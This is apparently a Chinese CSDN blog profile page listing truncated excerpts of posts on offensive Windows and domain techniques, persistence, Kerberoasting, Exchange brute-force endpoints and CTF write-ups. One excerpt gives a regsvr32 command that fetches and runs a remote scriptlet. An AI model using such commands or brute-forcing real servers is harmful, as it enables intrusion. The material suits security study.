自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

rv0p111

学习的脚步

  • 博客(12)
  • 收藏
  • 关注

原创 powerView--Get-NetDomain

获取域的有关信息filter Get-NetDomain {<# .SYNOPSIS Returns a given domain object. .PARAMETER Domain The domain name to query for, defaults to the current domain. .PARAMETER Cr...

2019-10-15 16:22:13 463

原创 无回显--查询进程存活情况

当我们无法获取回显判断进程是否存活的方法调用命令regsvr32 /s /n /u /i:<url/aa.sct> scrobj.dll<?XML version="1.0"?><scriptlet><registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA0...

2019-10-12 13:47:57 226

原创 Exchange可以拿来爆破的接口

Exchange可以拿来爆破的接口1、EWS 服务 URL,exchange web 服务配置https://192.168.88.129/ews/exchange.asmx2、还可以是owa接口–提供WEB方式邮件访问功能https://192.168.88.129/owa3、可以是AUTODISCOVER自动发现服务根据您是否在单独的站点上配置了自动发现服务,自动发现...

2019-10-09 16:42:02 2514

原创 看雪ctf晋级赛第十题wp

使用PEiD查看下是.net程序,这个程序是可以直接进行反编译的所以我们使用ILSpy进行反编译下,我们可以看到程序就是叫我们输入一个字符串,然后和Kanxue2019一起给传入a函数当中,算结果为4RTlF9Ca2+oqExJwx68FiA==所以下面我们看下a函数,ICryptoTransform是拿来做加密转换的,RijndaelManaged类是拿来做AES算法的一个类,...

2019-10-08 13:37:42 308

原创 看雪ctf晋级赛第六题wp

查看导出表,就一个main函数打开strings窗口,查看strings,可以看到下面是有很多字符串的程序运行,输出结果如下所示,所以我们需要去定位到这个字符串,看看是哪里调用的在我们的sub_4014C0当中被用到了查看伪代码如下所示scanf以后是sub_004012F0这个函数验证,验证从第8位开始之后的12位字符,要全部相等,然后以及我们输入的字符...

2019-10-08 13:28:49 354

原创 看雪ctf晋级赛第二题wp

安卓题目,应该就是有关动态库的题目了,所用对动态库进行分析,利用工具IDA、jeb、vs等利用IDA动态调试,对sub_784进行分析,可以确定其实就是是rc4加密算法,以及下面的进行编码的业务逻辑组成用到的其实就是RC4算法: 1、密钥流:RC4算法的关键是根据明文和密钥生成相应的密钥流,密钥流的长度和明文的长度是对应的,也就是说明文的长度是500字节,那么密钥流也是500字节。当然...

2019-10-08 13:19:24 537

原创 看雪ctf晋级赛第一题wp

利用中文引擎搜索搜索到Kanxuectf这一串字符串的所在,然后下断点之后就会发现它在和我们做比较,然后我们输入的26个大写的英文字母变成了下面的内容89opqrstuvwxyzOPQRSTUVWXYZm然后我们就找到了下面的对应关系,然后我们需要从右边的字符串当中找到KanXueCTF2019JustForhappy,对应的左边的字符串0 a1 b2 c3 d4 e5 f...

2019-10-08 13:17:11 241

原创 基于rpc调用-动态加载ssp

此篇文章结合学到的知识做个总结微软有个api为AddSecurityPackage,可以添加ssp,这里就看下其的实现逻辑,这里从将从公开这个 API 的 secur32.dll 这个 DLL 文件开始,主要为本人进行了修改以及自己去复现的总结在 Ghidra 打开这个 DLL 文件,这实际上只是一个调用 sspcli.dll 的包装器我们这边主要是看sspicli.dll的实现逻辑是...

2019-10-08 11:48:54 3218 2

原创 Library-Files-维持权限--对比自带CLSID打开程序

下面是3g老师的代码function Invoke-LibraryFilesPersistence{ <#.SYNOPSISFirst modify the registry and then create a file named Documents.library-ms in %appdata%\Microsoft\Windows\Start Menu\Programs\Acc...

2019-10-06 10:43:02 259

原创 IIS-扩展接口ISAPI-Filter分析

ISAPI 筛选器(ISAPI filter)导出函数1、BOOL WINAPI GetFilterVersion( PHTTP_FILTER_VERSION pVer);该函数是DLL筛选器第一次被加载到站点处理进程时被调用。2、DWORD WINAPI HttpFilterProc(PHTTP_FILTER_CONTEXT pfc,DWORD notificationType,LPVO...

2019-10-04 11:00:47 605

原创 屏幕截图--Take-ScreenShot分析

C#代码分析$code = @' using System; using System.Runtime.InteropServices; using System.Drawing; using System.Drawing.Imaging; namespace ScreenShotDemo { /// <summary> /// Provides functi...

2019-10-02 23:30:53 1648

原创 Kerberoast 工具集--查找域下的SPN--GetUserSPNs

代码如下所示# Edits by Tim Medin# File: GetUserSPNS.ps1# Contents: Query the domain to find SPNs that use User accounts# Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast...

2019-10-02 21:34:24 1493

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除